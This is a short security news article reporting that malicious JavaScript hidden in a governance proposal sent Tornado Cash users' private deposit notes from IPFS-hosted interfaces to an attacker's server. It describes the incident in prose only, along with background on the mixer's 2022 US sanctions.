27 February 2024

Tornado Cash users’ funds at risk due to malicious code


Tornado Cash users’ funds at risk due to malicious code

Deposits made to Tornado Cash, a well-known crypto privacy tool favored by hackers, may be at risk after a malicious code was inserted into certain user interfaces.

Tornado Cash, a decentralized privacy solution on the Ethereum blockchain, offers users non-custodial and anonymous transactions through a cryptocurrency mixer, enhancing privacy and security.

The security breach came to light through a Medium post by Gas404, a community member. The attack appears to have been orchestrated by an individual posing as a Tornado Cash developer who embedded malicious JavaScript code within the project’s user interface. This code stealthily captured and transmitted users' private deposit notes to an unauthorized external server. These deposit notes serve as crucial access keys for managing funds within Tornado Cash.

The encoded private deposit notes were covertly sent to the attacker's server under the guise of routine function calls, meaning users' private information was leaked without their awareness whenever they interacted with specific Tornado Cash functions.

The exploit primarily targeted users accessing Tornado Cash via IPFS gateways, like ipfs.io and cf-ipfs.com, which lead to the decentralized web where Tornado Cash operates. The malicious code was hidden within a governance proposal, making detection challenging for average users.

This code redirected user deposit information to a server controlled by the attacker.

All Tornado Cash servers deployed on the IPFS network since January 1, 2024, are believed to have been impacted.

In August 2022, the Tornado Cash crypto mixer was sanctioned by the US authorities for its involvement in laundering money for North Korean hackers. Although the original website of the service was seized, the open-source codebase of Tornado Cash continued to exist independently, giving rise to new mixing services built upon the same framework.

Back to the list

Latest Posts

Iranian hackers exploit RMM tools to deliver malware

Iranian hackers exploit RMM tools to deliver malware

One of the aspects of MuddyWater's strategy involves exploiting Atera's free trial offers.
24 April 2024
Ongoing malware campaign targets multiple industries, distributes infostealers

Ongoing malware campaign targets multiple industries, distributes infostealers

The campaign leverages a CDN cache domain as a download server, hosting malicious HTA files and payloads.
24 April 2024
US charges four Iranian hackers for cyber intrusions

US charges four Iranian hackers for cyber intrusions

The group targeted both both government and private entities.
24 April 2024